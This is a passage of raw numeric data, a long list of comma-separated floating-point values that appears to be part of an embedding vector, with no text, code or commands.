4234,-0.006628477,0.011716371,0.005560953,0.001987591,0.009015264,0.0035566613,-0.038975462,-0.0019922333,0.01685518,-0.023954857,-0.0057657165,-0.011477551,0.03950282,-0.015345309,0.0012584426,0.009713786,-0.012898755,0.011731697,-0.021271465,0.010148748,-0.04832648,0.0055441246,0.016338734,0.019786539,-0.012997389,0.03799648,0.026170658,-0.0010578549,-0.0017603865,-0.0117550045,-0.024963643,0.0007948426,-0.020309297,0.012666658,-0.00021934632,-0.004741289,-0.053042237,-0.007438494,-0.024550477,-0.042868145,-0.031904843,0.04794678,0.011687519,0.0062411325,0.009051975,0.0029610076,-0.014748535,-0.0010379548,0.0024876695,-0.02816954,-0.010204892,0.00335875,-0.014037144,0.014562093,0.032372955,0.012501207,-0.011363091,-0.026264112,-0.0002085791,0.005707264,0.0005164195,-0.024700847,-0.012275241,0.02003059,-0.02747217,0.010539858,-0.018747002,0.032285523,0.0008695877,0.032784946,0.020223886,0.013265205,-0.002602887,0.021951387,-0.010436174,0.020311585,0.008513751,0.02692965,0.019567251,0.011935675,0.011856979,-0.010688992,-0.005161906,-0.015985232,0.0037737328,0.016199693,0.041302387,0.017194692,0.019107254,-0.0070917653,0.017476376,0.02752435,0.008138748,-0.003271817,0.012586109,0.009633936,0.0008064307,0.030462993,-0.009286603,0.010415637,-0.010869165,-0.012804297,-0.013039408,0.026917314,0.03700808,0.002752082,0.014926833,0.0059728106,-0.004425938,0.0012287614,-0.0026348215,-0.010848066,-0.009014729,-0.025977787,-0.009514448,-0.023620099,-0.005833634,-0.03389722,0.005058232,0.018144848,0.008677678,-0.018499337,0.0074371127,-0.02581977,-0.004788097,-0.009693597,-0.034849547,-0.010199888,0.0018340664,0.028874887,-0.009222146,-0.00048932876,0.012212077,-0.0060671703,0.0015507224,0.029519303,-0.026278453,-0.019520799,-0.0052824407,-0.007449939,0.020018298,0.01970138,0.014118059,0.0069588935,-0.01183472,-0.01556184,-0.019953307,-0.0006308249,0.0067407046,-0.013582081,0.0067778192,0.007827484,0.0012117141,-0.002606315,-0.019962141,-0.03212942,0.019602437,-0.03647546,-0.021170892,0.00336539,0.010803257,-0.022606334,0.023817739,-0.02653796,0.009883903,0.026742471,0.00031039052,0.0015357384,-0.0131939985,-0.00039231076,0.028850513,0.028806694,-0.021384656,-0.039365403,-0.038491074,0.004844054,-0.0045015733,0.009859658,0.0020157266,-0.019851405,-0.015729887,-0.022800297,0.0056299414,-0.031407617,-0.00027444086,-0.0047203605,-0.036666617,0.029587971,-0.025993718,0.015248111,0.019529859,0.003417533,0.013268524,-0.016111428,0.018121796,-0.030867228,-0.024752824,0.009028894,-0.022557879,0.014683844,0.0074829883,-0.018707689,-0.010274777,-0.036787666,0.014335329,-0.012952846,0.021803612,0.011764356,-0.024440967,-0.011484442,0.009821769,-0.017529918,0.0070431647,-0.02741812,-0.018186657,0.000031793898,0.00078019686,0.014225293,0.00712448,-0.03965783,0.018516393,-0.014481983,-0.022971237,0.021368204,0.006303167,0.0162596,-0.007822661,-0.004391891,-0.0021422547,-0.014980621,0.032021217,-0.009129474,-0.0036542627,0.022553492,0.0009675562,0.01717431,-0.00792585,-0.009594614,-0.01948694,-0.008901671,0.024334334,0.002563198,-0.0019321159,0.001072046,-0.0015150544,-0.000094016694,-0.011074727,0.02202573,0.008242552,0.006484698,0.039944705,0.0036344733,-0.03224749,-0.014421118,0.018130863,-0.0009795517,0.0027404882,0.013068124,-0.027732173,0.038926266,0.03338849,-0.022307439,-0.005529799,0.022028223,-0.009092085,-0.007853134,0.010766191,-0.00030728756,-0.01746554,-0.014565807,0.030268425,-0.021471161,-0.010505456,-0.0014909715,0.0019265251,0.014409708,-0.0022820744,-0.00077640085,-0.013523217,0.00824899,0.016178222,-0.015873857,0.0075000604,-0.0011784099,0.02260018,-0.024607599,-0.010570651,0.011018405,-0.0006562832,-0.0021888025,0.0029447174,-0.005385879,-0.0048845834,0.01118847,-0.028804308,-0.009719169,0.0055764653,-0.01039337,0.00085523713,0.021346128,-0.00038981836,0.0021593545,0.0030153783,-0.003974269,0.0024978798,-0.022250773,-0.029471433,-0.0069208806,-0.008801023,-0.004833836,-0.021636117,0.021853054,0.02672416,-0.0038853912,0.008982684,-0.002394981,-0.057247303,0.025830116,-0.011796594,-0.011929548,0.0011669045,0.0025089632,0.010279769,0.01582344,0.052698344,-0.011868656,0.0055625974,-0.0059947604,0.017365873,0.01574106,0.010648753,-0.0062289983,-0.026238259,-0.011692022,0.024665242,-0.0018508459,-0.011335654,-0.0011272593,0.010986455,0.008668495,0.049821034,-0.0032426736,-0.016832232,0.004857457,-0.02281461,0.011140428,0.005644354,0.026579298,0.00659361,-0.01626378,-0.014403557,0.001275478,0.012558309,0.019519374,-0.008161967,0.0026390604,0.0057244375,-0.006291676,0.00046434728,0.01173504,-0.021083178,-0.017652886,0.0062993,-0.012606768,-0.003840103,-0.011958773,0.020658081,-0.007540827,0.004653875,0.0106598195,-0.009030133,0.01186042,-0.0044405814,0.0098690875,0.035071187,0.019845791,-0.0022958647,-0.0044193007,0.029287305,0.0038653295,-0.025002843,-0.006757083,0.00260667,0.04899734,-0.021374485,-0.02525198,-0.022686327,0.0032023743,-0.01578821,-0.0092935255,-0.02760398,0.012222669,0.0035457034,-0.009926088,-0.002551576,-0.00791699,-0.008246708,0.013948421,-0.027706075,-0.0006247042,-0.03159477,-0.017959736,-0.0041976934,0.009491193,-0.007312222,-0.0032312223,0.0012973169,0.00013146683,-0.012365001,0.014594035,0.005790694,0.030362114,-0.017027918,-0.0067277304,0.008687936,0.0076356167,0.030873658,-0.007102825,0.0097109685,0.062059432,0.0120164575,0.0011207231,0.016107073,0.0029940258,0.017648824,0.023285428,-0.008049244,0.008336108,-0.015530649,0.015996417,0.010689392,-0.0098982975,-0.013185381,0.01568018,0.011777288,0.016581183,-0.020407116,-0.010614791,0.015674392,0.0022988303,0.023781732,0.007764621,0.014017471,-0.0032500892,-0.0130151175,-0.0025166918,-0.0077946326,0.02476634,0.010922369,-0.01130365,0.015926924,0.012768747,0.001235631,-0.016275557,-0.003583064,-0.0030129969,-0.015976142,-0.00071930065,-0.016532704,0.0033014626,-0.005107596,-0.019881282,-0.0016507704,-0.0008137595,0.0039128894,0.008103008,-0.0118145,0.01709538,0.0023651018,-0.003461151,-0.0023339519,-0.0081748925,0.012090829,-0.0108499825,0.006774263,0.017026912,-0.013570746,-0.029071081,-0.0017059182,-0.0065885335,-0.037897814,0.017249739,0.0015420418,-0.004175879,-0.011919349,-0.0069071027,-0.0033634007,0.018077094,-0.0042511947,0.035464372,0.0032480168,-0.032788247,0.021018786,0.02361944,-0.0037641828,0.034979045,0.0065613864,0.035499167,0.0079030115,-0.0039049007,-0.006730433,-0.014325901,-0.0048072794,-0.014974543,-0.021521386,-0.00077097036,-0.006167183,-0.011797208,0.011190532,-0.01934473,-0.011513939,0.04395926,-0.008617142,0.018464327,0.013219572,-0.019178487,0.0053320546,0.020492792,0.009425004,0.040712316,-0.021288298,0.019375207,0.033486195,-0.045150306,-0.0044762427,-0.014166278,0.0010205746,0.002302774,0.019694518,0.0015076342,-0.00911324,-0.02606987,-0.013376999,0.009319388,0.020026127,-0.0107528735,-0.00061194797,0.030281568,0.016601454,0.008347847,-0.012471258,-0.012173751,0.0123984,0.012843326,0.004024992,-0.015875036,0.011622065,0.007291327,0.000526814,0.029929724,-0.022915551,-0.0034742886,-0.0007359752,0.003194683,-0.009199259,-0.0029630605,0.007061541,0.026623646,0.018504871,-0.02909563,-0.015244704,0.023814684,-0.0054943394,-0.007360081,0.013669835,0.017970998,-0.006019274,0.00919045,0.013840066,0.022946814,-0.001965573,0.001402438,-0.024023734,-0.015007078,-0.0027061128,-0.008688525,-0.008639152,0.003481499,-0.011870024,-0.009156627,0.0011100781,0.014301185,-0.005965222,0.0067797694,0.03350502,0.0012890887,-0.007889035,0.0027198368,0.012786632,0.026907777,0.00189674,0.012902642,-0.011104112,-0.0042967927,0.0051978356,-0.0017198988,0.0107443025,-0.0014937512,0.012566649,-0.030282827,0.0154215265,0.010622881,0.02472229,-0.020074546,0.0126231685,0.011517474,-0.02012297,-0.026027178,0.015161002,0.008091398,0.0033558754,-0.0166063,-0.01750366,0.0036451747,-0.0026873609,-0.010269583,0.08883822,-0.025070243,0.015894061,-0.01578456,0.0057412717,-0.025064703,0.02223182,-0.005583176,0.0007332766,0.0060486426,-0.02118087,-0.019039243,-0.013368514,-0.02063283,0.014848359,-0.009655385,0.017020734,0.00151262,0.0051297694,0.008274561,0.005677042,0.011107217,0.0072467644,-0.0015159085,0.00031789983,0.024665162,0.028543992,-0.021913229,0.008493395,0.0047226413,0.014465842,0.0017293106,0.017793618,0.015862633,0.012394544,-0.00249486,0.015922232,-0.004926758,-0.022855472,0.006749938,-0.00047279897,-0.018532572,0.012918024,0.011297161,0.034666892,-0.0029594484,-0.004896799,-0.0101316925,-0.0031796666,0.0074416446,0.010196678,0.010202406,-0.0064325044,0.012400837,-0.033114925,0.012625244,-0.00540108,0.021289285,0.009142805,-0.0011709064,-0.0077520763,0.011178142,-0.004960421,-0.025898065,-0.013096216,0.0042031044,0.0054207984,-0.029191813,0.022246828,-0.022564592,0.020675391,-0.0006544392,0.0028425893,0.028423175,-0.0012731923,0.009157414,0.008812491,-0.019286077,-0.009648864,-0.027214864,-0.010583274,0.008344434,0.027992256,0.006884966,0.0048447573,-0.005742612,-0.01634373,0.013424442,0.062270492,0.010396349,0.009252006,0.01136817,0.0022881196,0.02569745,0.02000725,0.02457789,-0.0062187104,-0.00953907,-0.029866183,0.014451509,0.0011606907,-0.005378464,0.01015507,-0.020402096,0.011000306,0.02164622,-0.0039390125,-0.033829957,0.0052037933,0.02809734,0.00930379,0.019648971,0.00084901496,0.01717209,0.0027206412,-0.008277441,0.012131446,-0.0019396469,-0.0068533137,0.0046067564,0.010452415,-0.008561284,-0.009711852,-0.03730837,-0.0012255176,0.12495203,-0.0051684454,-0.0038679333,0.034430202,-0.0055768294,0.0021208052,-0.107794784,-0.0016121404,0.012609054,0.01450635,-0.0052933367,-0.0074636578,-0.008197797,0.018622255,0.0025819526,-0.023410898,-0.0040054666,-0.011850053,0.0266185,-0.017600546,-0.009015072,0.004974557,-0.0028428226,0.012698576,-0.022787526,-0.0017357185,0.0019700974,-0.0063809,-0.012952497,-0.027422668,-0.009983786,-0.0030679929,0.0073749013,-0.03257875,-0.038091168,0.017728893,0.023682537,-0.010144058,-0.01903681,-0.0119481925,0.021032246,0.0055156285,-0.026614528,-0.030038316,-0.15869159,0.0037331716,-0.010431569,-0.048711713,0.016010404,-0.015259362,0.00527994,0.012478128,0.024985882,0.026099697,-0.0114363795,0.018480478,-0.017309662,0.01519727,-0.032463707,-0.008314769,0.008641659,-0.010700068,0.008998855,-0.0018295583,0.0035287032,-0.012104156,-0.025412148,-0.013849888,-0.021334715,0.006476811,-0.00017875616,0.04832803,-0.009848237,-0.012366903,-0.02080113,0.009252604,-0.0344063,0.005800882,-0.01030785,-0.02249114,-0.02239044,-0.00016365545,-0.016385857,0.040565897,-0.025420632,-0.0006922572,-0.01132359,0.00024081927,0.0070861997,0.023157224,0.012407109,0.0199629,0.013190334,0.0038886876,0.03490233,0.010667848,-0.013816784,0.0055637704,-0.004164051,-0.006263572,0.00013874327,-0.024745556,0.00047557915,0.0017577548,0.00068157155,0.002253776,-0.015382402,-0.018171547,0.03804744,-0.01359939,0.004651179,-0.016293123,-0.005334593,0.02205944,-0.012897566,-0.0072484454,-0.0042703985,-0.017290177,0.011288049,0.012780002,0.0001546278,-0.0074171564,0.014068066,-0.024210762,0.004157385,-0.02441111,-0.0031617212,-0.036054965,-0.00026335398,-0.0102309715,-0.017305756,0.012984287,-0.020445315,-0.019110233,0.032450236,-0.013266386,0.0082908645,0.0018585833,0.028566765,0.001325856,0.03388179,-0.023218792,-0.019454075,0.000978526,0.0034806817,-0.023453632,-0.02311318,-0.00045356713,-0.012079335,0.0034939197,0.013749385,-0.021755997,-0.01944682,0.0009696441,0.0036603091,-0.01746917,0.026060168,-0.010733269,-0.04042093,-0.0137862535,-0.002843379,0.0006355221,0.024177011,-0.014540255,-0.022729225,0.005260721,-0.013186365,0.015409412,0.046239197,0.02367389,-0.031612527,-0.0061659357,0.012330999,0.010206875,-0.03388897,0.017737545,0.0012859948,-0.0052321893,-0.01662977,-0.0076380423,-0.0057506235,-0.00036287514,-0.030404598,0.011706646,-0.011868126,0.0018790768,0.00095017726,0.008789638,-0.00468512,-0.018933699,0.017715437,-0.013953494,0.028525265,0.0011213265,0.0042830105,0.027900036,-0.028153792,-0.008797787,0.013000266,0.068286166,-0.003774531,-0.012080556,0.013144149,-0.0016210113,0.016127296,0.018772585,-0.01498377,-0.018887896,-0.0009874875,-0.032171298,-0.00083547155,-0.0008808349,0.018344972,-0.0127198,0.010609155,0.020155722,0.014325345,0.012255883,0.0004654734,0.008748449,-0.022222403,-0.0060143475,0.036203954,0.015633125,-0.008785119,0.024679607,0.0094293235,-0.004240362,0.0013467715,-0.0030434276,-0.008029584,-0.0062988447,0.0051585673,-0.00053287856,-0.035245944,-0.036615048,-0.011713311,-0.005406385,-0.009623694,0.012026443,0.029422343,0.01847176,-0.00061744085,0.0064411582,-0.015942972,-0.008194566,-0.006776209,0.014196115,-0.015679661,0.0062973825,0.010782427,-0.019127816,-0.00998763,-0.005732903,-0.008142576,-0.009114367,-0.011499803,0.0045396383,-0.00007642932,0.026766457,-0.013804978,-0.016593391,-0.012608405,-0.012813645,0.0024584013,-0.0033745088,0.011751353,0.0072690416,0.017267972,-0.0025466387,-0.0015124958,-0.036996875,0.0028135956,-0.00048844935,-0.017846657,-0.0068640844,0.006107055,-0.007814826,0.024523757,0.011859317,0.015824614,0.0015310259,0.0034202207,-0.0125552425,-0.02266452,-0.017475624,0.03802834,-0.027506335,-0.0041681337,0.023463797,0.009992805,0.008309908,-0.001649126,0.015891079,0.008372052,0.017523032,0.003608616,0.028786993,0.0025422825,0.009130525,0.0040102936,-0.002449079,-0.009745871,-0.020968089,-0.012011771,-0.004984867,0.025790442,0.02387713,-0.018787848,-0.00061971095,-0.018385533,0.0033774883,-0.023400491,0.0019489622,0.036241684,-0.022914948,0.013517202,0.029666446,0.003457262,-0.012552076,0.0042462004,0.004466303,-0.02423718,0.002791637,-0.023790514,0.019049045,0.0012769143,-0.018242469,0.027526494,0.010964716,0.025095247,0.002089508,-0.011178568,-0.0025125307,-0.0015666729,0.025558604,0.012267012,0.0023370406,0.01302478,-0.024920626,-0.021389281,-0.003777066,0.0072163194,0.00018217773,0.009776035,0.01267106,0.01626449,-0.013022958,-0.0010884772,-0.023412237,0.029621933,-0.0072467276,0.0067542363,0.008976315,0.01720697,-0.012995335,-0.010851628,-0.006169424,-0.020109907,0.0034803618,0.02620438,-0.018889278,0.0055390378,-0.022617642,0.034545273,0.0365018,-0.0027140563,0.018402504,0.0032824464,0.011244501,-0.017025517,0.009015725,-0.0099216895,0.002498532,-0.022691688,-0.008146757,0.013710297,-0.02258216,-0.01675478,0.0044933176,0.007501473,-0.0010388887,-0.010736476,0.009985429,0.003578121,0.003954989,0.035824403,0.008940742,0.0221477,0.010557423,0.015174089,0.001223608,-0.008959443,-0.020383874,-0.005275557,0.022884367,-0.009641804,0.00462215,-0.005469493,0.0016144185,0.013161227,-0.01470656,-0.026506292,-0.0025095576,0.0031826992,-0.007402219,-0.017265536,0.010934821,-0.0016540609,-0.0031255463,0.008801387,-0.016134718,0.01136504,-0.013439849,-0.017518045,0.0095569445,0.022822218,0.0025748638,-0.03317424,-0.0029439924,0.0014367512,-0.0049354653,0.010762422,-0.00095160067,-0.0098837,0.007909195,0.06716412,-0.013343931,0.008375413,-0.0136869205,0.032769527,0.025273785,-0.017654737,-0.009781036,-0.0027565877,-0.024970634,-0.013722372,-0.038263127,0.014599311,0.009607248,-0.04500308,-0.01754951,0.01843218,0.0041491673,0.0065575126,0.010848527,-0.0027730076,-0.003113044,0.031253885,0.016075647,-0.01276803,-0.05151961,-0.012445941,0.0017984747,-0.011379073,0.02097792,0.001221733,-0.01954076,-0.017620718,0.0074821985,-0.02126498,-0.0065083737,-0.017565332,0.0011162821,0.012690259,0.0077328663,0.026654942,0.003345198,0.005016668,-0.0019194188,-0.01369788,-0.009431445,-0.014225243,0.0012002937,-0.017724346,0.021803068,-0.02612796,0.012738691,0.0065148794,0.009353459,-0.027135257,0.010077676,0.013611332,-0.0030528004,-0.0029567573,0.00728246,0.021013483,0.0064863386,-0.023930091,-0.02777758,0.015095858,0.0039169546,-0.021122498,-0.016957542,-0.010631778,-0.003710362,-0.01882205,0.009485273,-0.0041432306,0.010326361,-0.0075795096,-0.022889594,0.012544324,0.008754574,-0.008701784,0.018790886,-0.023004547,0.0050410177,0.0011975863,-0.0138066895,0.0011856603,0.018402021,0.0013701003,0.02167789,0.0041339993,0.0134445755,0.051671676,0.0025744212,0.012176804,-0.006693336,-0.018406916,-0.00058839715,-0.011637854,-0.032834828,-0.0042645745,-0.012035821,-0.02162238,0.00034783417,-0.01449656,-0.008977232,-0.017368335,-0.0039592404,-0.13370858,0.002183843,-0.021213733,-0.012375588,-0.022493714,-0.0100675635,0.004911603,0.023134308,0.00041128142,-0.034197804,0.001241749,0.032409906,0.0062480303,-0.010756184,-0.012143598,-0.0017261718,-0.025857002,-0.015368777,-0.0061000376,0.0054499577,0.018859878,-0.025056358,0.0001903252,0.015916428,0.010494192,0.0077538094,0.005155008,0.017087502,0.0044542775,0.0044595483,0.00080044597,0.0023295337,-0.009052836,0.014380774,-0.010995651,0.004873068,-0.012432761,-0.005685364,-0.0124325715,0.004689021,0.0016161782,-0.008948801,-0.014823866,0.01876593,0.012413385,-0.000653859,0.009209738,0.013350841,0.02683983,0.027423803,-0.00031300064,-0.0038216012,0.0025415877,-0.0087674195,0.002249613,-0.0095056845,0.009882422,0.004453004,0.0067264186,0.0043307096,-0.018016992,-0.0021095464,0.0016273404,-0.011330136,0.008107429,-0.0012630102,0.0027901751,0.005437445,-0.02677238,0.0012725628,-0.000853161,0.020712309,-0.004754034,0.0018018913,-0.009806216,0.012813254,0.013420723,0.017181754,-0.015807347,0.021036806,-0.03578415,-0.01700108,0.006648369,0.040959947,-0.02075286,-0.02433741,-0.0007330177,0.006453501,-0.03291801,0.018479604,-0.0027574887,0.0044055143,-0.0056148004,-0.016073735,-0.031509135,0.0041452595,-0.0020747927,0.014719422,-0.011812277,-0.0028778096,0.0144734,-0.0010845842,-0.0036354612,-0.033504065,-0.12736219,-0.012574749,0.035931464,-0.01765453,-0.0038835565,-0.011445032,0.019792443,0.0024602595,0.032116674,0.014298849,-0.014153016,0.011357413,-0.026978686,0.0006450238,0.007493981,0.0068357773,-0.044112936,0.0073897624,-0.0023348192,-0.020376286,-0.0020073336,-0.014045005,0.009506735,0.007192217,0.010645078,0.015386886,0.021874929,0.02805293,0.020962775,-0.002656157,-0.0064716167,0.0011568606,-0.0014758165,0.012899776,-0.04117458,-0.010478327,-0.0065662153,-0.021268746,-0.006167131,0.018316872,0.004907585,0.015374444,0.015751906,0.020105498,-0.0001245292,-0.018196976,0.007610638,0.02900933,0.009437545,-0.008376675,0.0031706875,0.0022576675,0.009710868,0.000031443724,-0.00012077235,-0.009877468,0.022915898,0.012486184,0.0114398645,0.009200066,0.012045159,0.009261735,-0.024042841,0.010194489,-0.0027758658,0.011239249,0.008947185,0.02241551,0.006397068,0.01608414,0.0040434776,0.029488696,-0.009902635,-0.00025897118,0.02016769,0.00716165,0.012590399,0.026524603,0.016442873,0.017637415,-0.0013150941,-0.020175578,0.017309662,0.0018694893,-0.029327529,0.026698705,0.005387097,0.00028295006,-0.02462324,0.008487723,0.010434551,0.008624389,0.006185608,0.037080657,0.017871289,0.010811985,0.06916816,-0.00032930795,-0.023322303,0.0003706841,-0.006432025,0.008597596,-0.018298235,-0.010432598,-0.023048032,0.0179004,0.02777529,0.014540319,0.0061714156,0.005624751,-0.0006785311,0.026455225,-0.027969135,0.008807924,0.0003034314,0.009923472,-0.0007814485,-0.010154438,0.0006163872,0.0037269674,0.032390047,-0.0021748492,0.0076438645,-0.020927554,0.0041775745,-0.02544972,-0.008888078,0.0024171157,0.0016182951,-0.02215602,0.00084196497,0.0018506963,0.0042183395,-0.008018778,0.0044268314,0.0118775135,-0.005695219,0.00008207589,0.00017715438,0.0056186207,-0.0019612366,0.019268045,0.00028565925,-0.0022726108,0.007674834,0.0075716097,-0.019311063,-0.01718357,-0.011794308,0.016240241,0.0036896896,-0.017019501,0.01772134,0.025694087,0.0153820645,0.010273974,-0.010186761,0.0001736043,0.006824346,0.0046001095,-0.007942897,0.016925968,0.021730734,-0.008617496,0.0066009723,-0.02947578,0.001928627,-0.0016951985,0.0020455623,0.016171396,0.002476956,-0.007481913,0.021929892,-0.05185267,0.0078064776,0.028493581,0.018727344,0.009116911,0.028885102,0.00755051,-0.0167777,0.012925631,-0.022242436,-0.011334509,0.011457001,0.02202476,-0.010717144,0.00047476415,0.0053345957,-0.007947265,0.042357534,0.0007562272,-0.015410747,-0.025385989,0.0014088711,0.0037071372,0.00054773473,0.015028882,0.013983205,-0.0076942197,-0.023716792,0.01628207,0.019299261,-0.018680738,-0.0027568399,0.0144568905,0.0038353994,0.032316927,0.012323591,-0.00294592,-0.02160292,0.007852132,-0.00035063855,0.0042282897,0.017202806,0.012363272,-0.018579394,-0.01696969,0.027003406,0.0070182434,-0.020929767,-0.0234989,0.011516355,0.007782273,-0.012714551,0.027310563,0.026988592,0.0084355725,-0.025637139,0.0021791225,-0.00029542053,-0.00022687738,-0.027877046,0.003973375,0.009495027,-0.003172192,0.015454749,0.017572885,0.009084432,-0.018125897,0.03271344,0.010422708,0.027367877,0.029429944,0.021080256,0.0042390935,-0.012620584,-0.021090172,0.01746183,0.037316877,0.0096026445,-0.0059547974,-0.007498171,-0.0046832208,-0.004243976,0.012367316,0.0035547507,0.0023778037,-0.0027395587,0.0121840015,-0.007848216,0.0072062803,-0.0035838245,-0.007551913,0.008608725,-0.010058503,-0.0068507455,-0.0331917,-0.0051014908,-0.0016291691,0.02247411,0.00844854,-0.008196828,0.02403559,-0.008681831,-0.007162262,-0.0012361032,0.00019255948,0.011704461,0.0046624555,0.014017551,-0.009203961,-0.008134739,0.024748458,-0.020151433,0.0138549395,-0.0017302869,-0.000052902556,-0.029264115,-0.011557767,0.0050233407,-0.010713956,0.0114298565,-0.010701383,-0.007144302,0.0069461223,0.008623577,-0.0037515128,0.011399906,0.00795575,0.0069739134,-0.0062058023,-0.020139208,-0.0016585068,-0.0034272608,-0.0051426818,-0.00060097146,0.02080043,0.0034788526,-0.030583663,-0.009648918,0.014070626,-0.01762516,0.00858069,0.0024915915,0.006227297,0.021317856,0.011854184,-0.046297267,-0.019661272,-0.011560201,-0.016274936,0.015847765,-0.019016521,-0.0060227,0.011842279,0.0065229125,0.027234713,-0.018352564,-0.006325,0.021069305,-0.04143839,-0.008667486,-0.017170073,0.022846876,-0.0062242313,0.010761865,0.030674398,-0.017299064,0.01496112,-0.0026348087,0.003943525,-0.0046646507,0.0053998306,0.009503885,0.019827284,-0.0011777587,-0.011226896,-0.0024618758,0.00640338,0.0031482687,-0.00023367771,0.0012497217,-0.012977985,-0.033347435,0.012950175,-0.02165743,0.00063333666,0.0042908182,0.003810577,-0.01315768,0.009719624,-0.0011395867,-0.013360714,0.015983937,-0.0020221667,-0.006822829,0.014425841,-0.017719492,0.0049060485,-0.015960138,0.022731205,-0.018343275,-0.014562244,0.010301373,-0.11254097,-0.014615705,0.0116748335,0.019926472,0.04087838,-0.0018709196,-0.017853225,-0.013401877,-0.013086261,0.006450496,0.004541888,-0.0190033,-0.015327943,-0.0038465082,0.038554326,-0.0013676013,-0.018229632,0.0101375105,0.01882566,-0.020990841,0.007819626,-0.008452834,-0.0033578924,-0.008912946,0.020470731,0.0015943232,0.0015206088,-0.01337336,-0.0014626791,0.0019374702,-0.027532386,-0.012364627,-0.00834098,-0.020482497,-0.013956986,0.004037297,0.0075228675,0.015190044,-0.026729919,-0.03079343,-0.007841778,0.014769513,-0.0017368752,-0.00078766176,-0.041850064,0.005973878,-0.038976245,-0.001007302,-0.0101134665,0.017767236,-0.016699571,0.007773284,0.0091550825,0.030304074,-0.007619745,0.010188767,-0.014673297,-0.012834752,0.024391217,0.005457711,-0.0015972937,0.0053259945,0.017520597,-0.0040980573,0.0027740882,0.009632195,0.014234614,0.011470751,0.0026646215,-0.022977643,0.000645267,-0.028795814,-0.011120591,-0.01254513,-0.00046382967,-0.0066591455,0.009867465,-0.0025949145,-0.00060156966,0.0073064975,0.038308013,-0.0070903925,0.023311848,0.013330864,0.017554328,0.004004649,-0.0023070548,0.0059325607,0.016131043,-0.00031213922,-0.031473543,-0.020062909,0.036129292,0.00012145202,0.015227028,0.008631691,-0.017845673,0.0062360754,-0.0039789025,0.0014277273,0.0023522696,-0.0032491465,-0.016178569,-0.008888887,-0.0025410068,0.010625287,0.0045343204,-0.011434293,-0.007550794,-0.017088898,-0.0042410837,0.023441492,0.016085977,0.044250283,0.012882401,0.02394036,-0.0069834976,0.014989033,-0.0116404565,-0.031141447,-0.009191329,-0.0016218653,-0.004789673,0.024922755,0.023128018,0.009115805,0.010196722,-0.0044158255,-0.028739985,0.0039956807,-0.0045682397,0.023770472,-0.0021838963,0.00861553,-0.008216173,-0.0013114354,-0.0138494065,0.014945052,0.0080085965,0.02345895,0.007518966,-0.023267185,-0.0034256778,-0.010528512,-0.027351154,0.019420959,-0.012843948,0.0039915144,0.0048825867,-0.013597324,-0.010276988,0.006381431,0.006195036,0.0065375487,-0.008686566,0.0047494536,-0.010444472,0.00036760254,-0.0346874,-0.00026211515,-0.0013140852,-0.00079595525,-0.0078341495,0.002863523,-0.02131035,0.016110074,-0.0036708524,0.00005051691,-0.0016414479,0.0085530225,-0.014909626,-0.005002815,-0.0041525606,-0.006549747,-0.028527658,-0.009656404,0.026593274,0.017558,-0.0029902474,-0.011799184,-0.011158676,0.0066853706,-0.025014646,-0.018250426,-0.0056756213,-0.011683532,-0.0035568299,-0.005747799,0.0186122,0.007651626,-0.006161543,-0.0048737433,0.000026624786,-0.008107207,-0.00488029,-0.009917423,-0.0044213138,-0.009263538,-0.009678747,0.016002124,-0.009511699,0.0104468325,-0.008627976,0.005470425,0.03513413,0.0062552523,-0.008245029,0.01187113,-0.026440604,0.008104401,-0.014230852,0.018799825,0.013946934,0.121744476,0.0053152074,0.00818853,-0.0020514294,0.005357215,-0.007870661,0.011370191,0.008098763,-0.008070515,0.012319382,0.022095582,-0.028947689,0.008286207,0.0021717998,-0.010141,0.031881005,0.020168532,-0.027688142,0.027132565,-0.013354322,0.02009116,-0.008709377,-0.0152168805,-0.05090695,-0.004700477,-0.07442488,0.034310784,0.01370226,0.0036844846,0.03902812,0.0014988623,-0.002760172,0.008417675,0.0048775906,-0.020050617,0.015417252,0.008734189,-0.015768385,0.0036415602,-0.014133379,0.023195745,0.0063323495,-0.00074036047,-0.011108679,-0.011906633,-0.0054473914,0.004730398,-0.011496336,0.007439834,-0.018027466,0.010913242,-0.0022835226,-0.0035977906,-0.013873687,0.00012524048,-0.021289825,0.0046412707,0.005157066,0.014162452,-0.0032309233,0.011899762,0.019625843,0.013053055,-0.009635102,0.014889942,0.011635191,-0.008563377,-0.008850212,-0.0041410835,-0.0065988516,0.015070477,-0.0083983,0.013990692,-0.006427279,0.00087638746,0.003428202,-0.0055093607,0.001663627,0.011673451,-0.00071950833,0.016616253,0.004973327,0.013487712,-0.0049057994,0.0028397455,-0.000987446,0.00087899866,0.014024484,-0.022318963,-0.012717669,-0.00052434445,0.0044988194,0.022076044,0.021830898,0.0011997701,0.0016628464,0.012681876,-0.007932385,-0.009406927,0.00612339,-0.026903845,-0.015297436,0.003938026,0.018688142,-0.012420477,-0.01245684,0.0041301586,-0.008968031,-0.01669567,-0.019251501,0.0031375214,0.018168775,0.020572687,0.0052276175,0.010315243,0.038729936,-0.02788982,-0.008068944,-0.0025027753,-0.020807857,-0.0022353001,0.017957848,-0.0028282253,0.023096558,0.008244848,0.007863887,-0.03012928,-0.010944781,-0.002205907,0.00000682646,0.004308444,-0.030000672,-0.0019121506,0.02227895,-0.008293095,0.010044761,0.03184331,0.0076149004,0.0028724102,-0.0051043364,0.0045730206,-0.016148223,-0.0038663582,-0.0074700215,0.005344086,-0.028874546,0.020252554,-0.0105953915,0.010442286,0.0025600267,0.0063146856,0.0104842745,-0.02457243,-0.005231149,0.0046558934,-0.009493638,-0.00053392124,0.004898035,0.008231039,-0.012547743,0.01009313,-0.007963141,-0.0033381702,-0.036428396,0.02941178,0.009876144,0.0096292,0.01299471,-0.022147706,-0.0067124525,-0.017100228,0.000698974,0.0061483607,-0.0066422224,-0.019229641,0.016557839,0.0031437352,0.012087323,-0.019711282,-0.012051882,0.011551536,-0.00030199805,-0.010396956,-0.00994561,0.026804231,-0.009687038,0.021202255,-0.014840368,-0.016901447,0.039282557,0.010428931,-0.008131543,-0.010234525,0.013900174,-0.024768991,0.03217952,-0.01733811,0.04430271,-0.013592829,-0.046763945,0.01865251,0.012306623,0.018563932,-0.021571776,0.020153508,-0.023441054,-0.008957523,-0.008514543,0.00040011678,-0.003915628,0.012408504,-0.013086213,0.0039530518,-0.026314808,0.015459717,0.009579706,-0.0125258155,-0.017476548,-0.00032240717,0.0011113767,-0.008871525,0.012405559,0.0068100486,0.0011789345,0.007681607,0.015157793,-0.0037187678,0.008171569,0.011325629,-0.015172843,-0.020296322,0.01015031,0.007391391,-0.013760533,-0.007977263,-0.005656524,0.031976562,0.018386414,-0.0001381437,0.010970273,-0.011685207,0.013822823,0.023398431,0.0020215996,-0.011423798,0.012206401,-0.0028304409,-0.03908903,0.0041807573